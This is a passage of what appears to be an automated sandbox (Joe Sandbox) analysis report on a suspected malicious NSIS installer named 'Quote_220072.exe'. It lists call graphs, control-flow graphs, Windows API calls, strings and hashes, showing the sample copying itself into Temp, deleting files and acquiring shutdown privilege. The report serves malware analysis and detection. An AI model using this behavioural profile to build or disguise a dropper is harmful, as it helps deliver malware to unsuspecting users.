3135->3137 3138 405cc9 3135->3138 3140 40617c 3 API calls 3137->3140 3215 405842 OleInitialize 3138->3215 3142 405c5f 3140->3142 3141 405ccf 3143 405cd3 3141->3143 3144 405ced 3141->3144 3145 405c6d GetClassInfoW 3142->3145 3148 40617c 3 API calls 3142->3148 3152 401533 90 API calls 3143->3152 3143->3153 3149 401533 90 API calls 3144->3149 3146 405c80 GetClassInfoW RegisterClassW 3145->3146 3147 405c96 DialogBoxParamW 3145->3147 3146->3147 3151 401533 90 API calls 3147->3151 3148->3145 3150 405cf4 3149->3150 3150->3150 3151->3153 3152->3153 3153->3000 3154->3054 3156 4066f3 3155->3156 3157 4066e7 CloseHandle 3155->3157 3156->3054 3157->3156 3158->2989 3225 406af8 lstrcpynW 3159->3225 3161 406627 3162 406ba3 4 API calls 3161->3162 3163 40662d 3162->3163 3164 403a64 3163->3164 3165 406d1b 5 API calls 3163->3165 3164->3000 3173 406af8 lstrcpynW 3164->3173 3171 406639 3165->3171 3166 406669 lstrlenW 3167 406675 3166->3167 3166->3171 3168 406534 3 API calls 3167->3168 3170 40667a GetFileAttributesW 3168->3170 3169 4065ad 2 API calls 3169->3171 3170->3164 3171->3164 3171->3166 3171->3169 3172 406cee 2 API calls 3171->3172 3172->3166 3173->3034 3174->3002 3175->3044 3177 4036c8 3176->3177 3178 4036ba CloseHandle 3176->3178 3226 403cf1 3177->3226 3178->3177 3183->3071 3184->3073 3186 406cfd 3185->3186 3187 406d03 CharPrevW 3186->3187 3188 403436 3186->3188 3187->3186 3187->3188 3189 406af8 lstrcpynW 3188->3189 3189->3077 3191 403386 3190->3191 3192 40336e 3190->3192 3195 403397 GetTickCount 3191->3195 3196 40338f 3191->3196 3193 403377 DestroyWindow 3192->3193 3194 40337e 3192->3194 3193->3194 3194->3081 3197 4033a5 CreateDialogParamW ShowWindow 3195->3197 3198 4033ca 3195->3198 3203 4061ed 3196->3203 3197->3198 3198->3081 3201->3087 3202->3089 3204 4061ff PeekMessageW 3203->3204 3205 4061f5 DispatchMessageW 3204->3205 3206 403396 3204->3206 3205->3204 3206->3081 3208 405970 3207->3208 3224 4065fd wsprintfW 3208->3224 3210 4059e9 3211 405cf9 18 API calls 3210->3211 3213 4059ee 3211->3213 3212 405a17 3212->3110 3213->3212 3214 405e98 17 API calls 3213->3214 3214->3213 3216 4054c6 SendMessageW 3215->3216 3219 405865 3216->3219 3217 40588c 3218 4054c6 SendMessageW 3217->3218 3220 40589e OleUninitialize 3218->3220 3219->3217 3221 401399 90 API calls 3219->3221 3220->3141 3221->3219 3222->3107 3223->3112 3224->3210 3225->3161 3227 403cff 3226->3227 3228 4036cd 3227->3228 3229 403d04 FreeLibrary GlobalFree 3227->3229 3230 4066f7 3228->3230 3229->3228 3229->3229 3231 406616 18 API calls 3230->3231 3232 406719 3231->3232 3233 406722 DeleteFileW 3232->3233 3234 406739 3232->3234 3235 4036d9 OleUninitialize 3233->3235 3234->3235 3237 406859 3234->3237 3269 406af8 lstrcpynW 3234->3269 3235->3011 3235->3012 3237->3235 3239 4065ad 2 API calls 3237->3239 3238 406761 3240 406779 3238->3240 3241 40676b lstrcatW 3238->3241 3242 406876 3239->3242 3244 406cee 2 API calls 3240->3244 3243 40677f 3241->3243 3242->3235 3246 40687a 3242->3246 3245 406790 lstrcatW 3243->3245 3247 406798 lstrlenW FindFirstFileW 3243->3247 3244->3243 3245->3247 3248 406534 3 API calls 3246->3248 3247->3237 3252 4067c1 3247->3252 3249 406880 3248->3249 3250 406563 5 API calls 3249->3250 3251 40688c 3250->3251 3254 406890 3251->3254 3255 4068af 3251->3255 3253 40683b FindNextFileW 3252->3253 3263 4066f7 59 API calls 3252->3263 3265 406807 3252->3265 3270 406af8 lstrcpynW 3252->3270 3253->3252 3258 406852 FindClose 3253->3258 3254->3235 3259 405d18 24 API calls 3254->3259 3257 405d18 24 API calls 3255->3257 3257->3235 3258->3237 3261 40689c 3259->3261 3262 40621b 35 API calls 3261->3262 3264 4068a5 3262->3264 3263->3265 3264->3235 3265->3253 3266 405d18 24 API calls 3265->3266 3267 405d18 24 API calls 3265->3267 3268 40621b 35 API calls 3265->3268 3271 406563 3265->3271 3266->3253 3267->3265 3268->3265 3269->3238 3270->3252 3272 406b7b 2 API calls 3271->3272 3273 40656f 3272->3273 3274 406591 3273->3274 3275 406587 DeleteFileW 3273->3275 3276 40657f RemoveDirectoryW 3273->3276 3274->3265 3277 40658d 3275->3277 3276->3277 3277->3274 3278 40659c SetFileAttributesW 3277->3278 3278->3274 3346 6ff812c6 3347 6ff8101b 4 API calls 3346->3347 3348 6ff812df 3347->3348 3349 6ff810c7 3356 6ff810f8 3349->3356 3350 6ff812be GlobalFree 3351 6ff81258 GlobalFree 3351->3356 3352 6ff811d7 GlobalAlloc 3352->3356 3353 6ff812ba 3353->3350 3354 6ff81548 3 API calls 3354->3356 3355 6ff81296 GlobalFree 3355->3356 3356->3350 3356->3351 3356->3352 3356->3353 3356->3354 3356->3355 3357 6ff815eb 2 API calls 3356->3357 3358 6ff81638 lstrcpyW 3356->3358 3360 6ff81165 GlobalAlloc 3356->3360 3359 6ff811ca GlobalFree 3357->3359 3361 6ff811ab GlobalFree 3358->3361 3359->3356 3360->3356 3361->3356 3362 6ff81cc7 3363 6ff81cee 3362->3363 3364 6ff81d4e __alldvrm 3363->3364 3365 6ff81d2f GlobalFree 3363->3365 3366 6ff815eb 2 API calls 3364->3366 3365->3364 3367 6ff81de5 GlobalFree GlobalFree 3366->3367 3368 6ff81aa7 3369 6ff8156c GlobalFree 3368->3369 3372 6ff81abf 3369->3372 3370 6ff81b01 GlobalFree 3371 6ff81add 3371->3370 3372->3370 3372->3371 3373 6ff81aed VirtualFree 3372->3373 3373->3370

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 4036da-403723 SetErrorMode GetVersionExW 1 403725-403745 GetVersionExW 0->1 2 40375c 0->2 3 403747-40374b 1->3 4 403758-40375a 1->4 5 403763-403768 2->5 8 40374e-403756 3->8 4->8 6 403775 5->6 7 40376a-403773 5->7 9 403779-4037bb 6->9 7->9 8->5 10 4037bd-4037c5 call 4068c4 9->10 11 4037ce 9->11 10->11 16 4037c7 10->16 13 4037d3-4037e5 call 40617c lstrlenA 11->13 18 4037e7-403803 call 4068c4 * 3 13->18 16->11 25 403814-4038ad #17 OleInitialize SHGetFileInfoW call 406af8 GetCommandLineW call 406af8 call 4065d4 CharNextW 18->25 26 403805-40380b 18->26 35 4038b3 25->35 36 403988-4039a2 GetTempPathW call 403c83 25->36 26->25 30 40380d 26->30 30->25 38 4038b5-4038bb 35->38 44 4039a4-4039c2 GetWindowsDirectoryW lstrcatW call 403c83 36->44 45 4039fa-403a13 DeleteFileW call 4033cb 36->45 39 4038c8-4038d3 38->39 40 4038bd-4038c6 38->40 42 4038d5-4038dc 39->42 43 4038de-4038ed 39->43 40->39 40->40 42->43 47 403948-40395c call 4065d4 43->47 48 4038ef-4038fb 43->48 44->45 62 4039c4-4039f4 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403c83 44->62 56 403bc4 45->56 57 403a19-403a1f 45->57 63 403964-40396a 47->63 64 40395e-403961 47->64 52 403915-40391b 48->52 53 4038fd-403904 48->53 60 403937-40393e 52->60 61 40391d-403924 52->61 58 403906-403909 53->58 59 40390b 53->59 67 403bc8-403bd5 call 4036b0 OleUninitialize 56->67 65 403a21-403a33 call 4065d4 57->65 66 403a84-403a8b call 405a1c 57->66 58->52 58->59 59->52 60->47 69 403940-403946 60->69 61->60 68 403926-40392d 61->68 62->45 79 403bc2 62->79 63->36 71 40396c-40396f 63->71 64->63 84 403a49-403a4b 65->84 81 403a90-403a92 66->81 85 403bd7-403be2 call 406a86 67->85 86 403bea-403bf1 67->86 75 403934 68->75 76 40392f-403932 68->76 69->47 77 403974-403983 call 406af8 69->77 71->38 75->60 76->60 76->75 77->36 79->56 81->67 89 403a35-403a3b 84->89 90 403a4d-403a54 84->90 98 403be4 ExitProcess 85->98 87 403bf3-403c09 GetCurrentProcess OpenProcessToken 86->87 88 403c6f-403c7e 86->88 92 403c0b-403c39 LookupPrivilegeValueW AdjustTokenPrivileges 87->92 93 403c3f-403c4d call 4068c4 87->93 88->98 94 403a46 89->94 95 403a3d-403a44 89->95 96 403a56-403a66 call 406616 90->96 97 403a97-403aaf call 4064da lstrcatW 90->97 92->93 106 403c5b-403c66 ExitWindowsEx 93->106 107 403c4f-403c59 93->107 94->84 95->90 95->94 110 403a6c-403a82 call 406af8 * 2 96->110 111 403bbe-403bc0 96->111 108 403ac0-403ae1 lstrcatW lstrcmpiW 97->108 109 403ab1-403abb lstrcatW 97->109 106->88 113 403c68-403c6a call 401533 106->113 107->106 107->113 108->111 114 403ae7-403aee 108->114 109->108 110->66 111->67 113->88 118 403af0-403af5 call 405e1c 114->118 119 403af7 call 405dfc 114->119 123 403afc-403b0e SetCurrentDirectoryW 118->123 119->123 126 403b10-403b1a call 406af8 123->126 127 403b1f-403b39 call 406af8 123->127 126->127 131 403b3a-403b58 call 405e98 DeleteFileW 127->131 134 403ba7-403bb1 131->134 135 403b5a-403b6e CopyFileW 131->135 134->131 136 403bb3-403bb9 call 40621b 134->136 135->134 137 403b70-403b95 call 40621b call 405e98 call 4066b4 135->137 136->111 144 403b9a-403b9c 137->144 144->134 145 403b9e-403ba5 CloseHandle 144->145 145->134
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004036F6
                                                                              • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                              • GetVersionExW.KERNEL32(?), ref: 00403732
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
                                                                              • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
                                                                              • OleInitialize.OLE32(00000000), ref: 0040381B
                                                                              • SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
                                                                              • GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quote_220072.exe",?,"C:\Users\user\Desktop\Quote_220072.exe",00000000), ref: 0040389B
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039CA
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004039D2
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004039E3
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004039EB
                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403A05
                                                                                • Part of subcall function 004033CB: GetTickCount.KERNEL32 ref: 004033DE
                                                                                • Part of subcall function 004033CB: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Quote_220072.exe,00000400), ref: 004033FA
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403AA8
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00408600,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403ABB
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403ACA
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Quote_220072.exe",00000000,00000000), ref: 00403AD9
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403B01
                                                                              • DeleteFileW.KERNEL32(0079F200,0079F200,?,007A9000,?), ref: 00403B54
                                                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Quote_220072.exe,0079F200,00000001), ref: 00403B66
                                                                              • CloseHandle.KERNEL32(00000000,0079F200,0079F200,?,0079F200,00000000), ref: 00403B9F
                                                                                • Part of subcall function 00405DFC: CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user\AppData\Local\Temp\,00403CA7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,004039A0), ref: 00405E04
                                                                                • Part of subcall function 00405DFC: GetLastError.KERNEL32 ref: 00405E0E
                                                                              • OleUninitialize.OLE32(00000000), ref: 00403BCD
                                                                              • ExitProcess.KERNEL32 ref: 00403BE4
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BFA
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403C01
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403C16
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403C39
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C5E
                                                                                • Part of subcall function 004065D4: CharNextW.USER32(?,0040389A,"C:\Users\user\Desktop\Quote_220072.exe",?,"C:\Users\user\Desktop\Quote_220072.exe",00000000), ref: 004065EA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Filelstrcat$DirectoryProcess$CharCurrentDeleteEnvironmentErrorExitNextPathTempTokenVariableVersionWindows$AdjustCloseCommandCopyCountCreateHandleInfoInitializeLastLineLookupModeModuleNameOpenPrivilegePrivilegesTickUninitializeValuelstrcmpilstrlen
                                                                              • String ID: "C:\Users\user\Desktop\Quote_220072.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\Quote_220072.exe$C:\Users\user\overlays\besvangredes$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 1152188737-1283633765
                                                                              • Opcode ID: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                              • Instruction ID: ef6c2823884109cd5a884fcd16d1840cc0f2fcd0ed87f9f7bcd5e2f232321f3d
                                                                              • Opcode Fuzzy Hash: 12ebdcd378dca8b2cb256432fecdbae80df5df33235eb46f5e0670d6daf7f44b
                                                                              • Instruction Fuzzy Hash: B8D14DB16043106AD7207FB19D45B6B3EECAB4574AF05443FF585B62D2DBBC8A40872E
                                                                              APIs
                                                                                • Part of subcall function 6FF812F8: GlobalAlloc.KERNEL32(00000040,?,6FF811C4,-000000A0), ref: 6FF81302
                                                                              • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6FF8294E
                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 6FF829A4
                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 6FF829AF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 6FF829C0
                                                                              • GlobalFree.KERNEL32(?), ref: 6FF82A44
                                                                              • GlobalFree.KERNEL32(?), ref: 6FF82A4A
                                                                              • GlobalFree.KERNEL32(?), ref: 6FF82A50
                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 6FF82B1A
                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 6FF82B2B
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 6FF82B82
                                                                              • lstrlenW.KERNEL32(00000808), ref: 6FF82B9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
                                                                              • String ID:
                                                                              • API String ID: 1042148487-0
                                                                              • Opcode ID: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
                                                                              • Instruction ID: 14d75f44c2bf112e64bfb1557c7cfcdfab37adebc0f739b83f76f6013975dfe7
                                                                              • Opcode Fuzzy Hash: 7ccf4f0c45c710cc9a2c16f0280818f85c59d15592c0a3b7650cbe1dbdedb346
                                                                              • Instruction Fuzzy Hash: FC429072A487029FD718CF3889547AAB7F0FF89714F004A2EE5B9D6290E771F5448B92

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 866 4066f7-406720 call 406616 869 406722-406734 DeleteFileW 866->869 870 406739-406743 866->870 871 4068b8-4068c1 869->871 872 406745-406747 870->872 873 406756-406769 call 406af8 870->873 874 4068a7-4068ad 872->874 875 40674d-406750 872->875 881 406779-40677a call 406cee 873->881 882 40676b-406777 lstrcatW 873->882 879 4068b7 874->879 875->873 877 406870-406878 call 4065ad 875->877 877->879 888 40687a-40688e call 406534 call 406563 877->888 879->871 884 40677f-406784 881->884 882->884 886 406790-406796 lstrcatW 884->886 887 406786-40678e 884->887 889 406798-4067bb lstrlenW FindFirstFileW 886->889 887->886 887->889 902 406890-406892 888->902 903 4068af-4068b2 call 405d18 888->903 891 4067c1-4067c3 889->891 892 406859-40685e 889->892 894 4067c4-4067c9 891->894 892->879 896 406860-40686e 892->896 897 4067e2-4067f5 call 406af8 894->897 898 4067cb-4067d1 894->898 896->874 896->877 911 4067f7-4067fe 897->911 912 406809-406812 call 406563 897->912 900 4067d3-4067d8 898->900 901 40683b-40684c FindNextFileW 898->901 900->897 906 4067da-4067e0 900->906 901->894 909 406852-406853 FindClose 901->909 902->874 907 406894-4068a5 call 405d18 call 40621b 902->907 903->879 906->897 906->901 907->879 909->892 911->901 915 406800-406802 call 4066f7 911->915 919 406833-406836 call 405d18 912->919 920 406814-406816 912->920 922 406807 915->922 919->901 923 406818-406829 call 405d18 call 40621b 920->923 924 40682b-406831 920->924 922->901 923->901 924->901
                                                                              APIs
                                                                                • Part of subcall function 00406616: lstrlenW.KERNEL32(007A4288,00000000,007A4288,007A4288,?,?,?,00406719,?,00000000,76F93420,?), ref: 0040666A
                                                                                • Part of subcall function 00406616: GetFileAttributesW.KERNELBASE(007A4288,007A4288), ref: 0040667B
                                                                              • DeleteFileW.KERNELBASE(?,?,00000000,76F93420,?), ref: 00406723
                                                                              • lstrcatW.KERNEL32(007A3A88,\*.*,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406775
                                                                              • lstrcatW.KERNEL32(?,004082B0,?,007A3A88,?,00000000,?,00000000,76F93420,?), ref: 00406796
                                                                              • lstrlenW.KERNEL32(?), ref: 00406799
                                                                              • FindFirstFileW.KERNEL32(007A3A88,?), ref: 004067B0
                                                                              • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00406841
                                                                              • FindClose.KERNEL32(00000000), ref: 00406853
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find$lstrcatlstrlen$AttributesCloseDeleteFirstNext
                                                                              • String ID: \*.*
                                                                              • API String ID: 2636146433-1173974218
                                                                              • Opcode ID: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                              • Instruction ID: 325cce783f2df783a7673d4e22b29853c472d97363b16a381ac5d63d2c539c61
                                                                              • Opcode Fuzzy Hash: e2e738021974a1aad663f4d73af15b9e2c0d72d7b607af8b3925b065a255c774
                                                                              • Instruction Fuzzy Hash: 2741373210631069D720BB658D05A6B72ACDF92318F16853FF893B21D1EB3C8965C6AF
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,007A5E88,00000000,0040665A,007A4288), ref: 004065B8
                                                                              • FindClose.KERNEL32(00000000), ref: 004065C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                              • Instruction ID: 54e165a9d952ab4a9c526d77f24574b80d9b4166436818e4e9d84c3548612847
                                                                              • Opcode Fuzzy Hash: a2d354ff7ed2319fbee56d8d140705e4a76cab61c7ff8bd1d53ab4a71d5363ca
                                                                              • Instruction Fuzzy Hash: A5D012315191607FC2501B387F0C84B7A599F65372B114B36B4A6F51E4DA348C628698

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 146 404f70-404f89 147 405111-405123 146->147 148 404f8f-404f95 146->148 149 405125-405165 GetDlgItem * 2 call 4054f8 SetClassLongW call 401533 147->149 150 40516b-40517f 147->150 148->147 151 404f9b-404f9e 148->151 149->150 153 405181-405183 150->153 154 4051bd-4051c2 call 4054c6 150->154 155 404fa0-404fb5 SetWindowPos 151->155 156 404fba-404fbd 151->156 158 4051b5-4051b7 153->158 159 405185-405190 call 401399 153->159 164 4051c7-4051e6 154->164 160 4050fd 155->160 162 40500d-405013 156->162 163 404fbf-404fde ShowWindow 156->163 158->154 171 405488 158->171 159->158 188 405192-4051b0 SendMessageW 159->188 165 405101-40510c call 405739 160->165 167 405015-40502a DestroyWindow 162->167 168 40502f-405032 162->168 163->165 166 404fe4-404ffa GetWindowLongW 163->166 172 4051e8-4051f3 call 401533 164->172 173 4051f9-4051ff 164->173 179 40548a-405491 165->179 166->165 174 405000-405008 ShowWindow 166->174 175 40546c-405473 167->175 176 405034-405042 SetWindowLongW 168->176 177 405047-40504d 168->177 171->179 172->173 185 405205-405207 173->185 186 405448-405461 DestroyWindow EndDialog 173->186 174->165 175->171 184 405475-405477 175->184 176->179 177->160 187 405053-40506d GetDlgItem 177->187 184->171 191 405479-405482 ShowWindow 184->191 185->186 192 40520d-405264 call 405e98 call 4054f8 * 3 GetDlgItem 185->192 189 405467 186->189 193 405092-405097 187->193 194 40506f-405088 SendMessageW IsWindowEnabled 187->194 188->179 189->175 191->171 222 405272-4052c1 ShowWindow KiUserCallbackDispatcher * 2 EnableWindow 192->222 223 405266-40526e 192->223 197 405099-40509a 193->197 198 40509c-40509f 193->198 194->171 196 40508e 194->196 196->193 200 4050dd-4050e2 call 405936 197->200 201 4050a1-4050a8 198->201 202 4050ae-4050b1 198->202 200->165 204 4050e4-4050f7 SendMessageW 201->204 207 4050aa-4050ac 201->207 203 4050b3-4050ba 202->203 202->204 208 4050ca-4050d3 call 401533 203->208 209 4050bc-4050c8 call 401533 203->209 204->160 207->200 208->165 219 4050d5 208->219 218 4050db 209->218 218->200 219->218 224 4052c3-4052c4 222->224 225 4052c6 222->225 223->222 226 4052c7-4052f2 GetSystemMenu EnableMenuItem SendMessageW 224->226 225->226 227 4052f4-405309 SendMessageW 226->227 228 40530b 226->228 229 405311-405357 call 4054e1 call 405cf9 call 406af8 lstrlenW call 405e98 SetWindowTextW call 401399 227->229 228->229 229->164 240 40535d-40535f 229->240 240->164 241 405365-405369 240->241 242 405388-40539c DestroyWindow 241->242 243 40536b-405371 241->243 242->189 245 4053a2-4053cf CreateDialogParamW 242->245 243->171 244 405377-40537d 243->244 244->164 246 405383 244->246 245->175 247 4053d5-40542c call 4054f8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401399 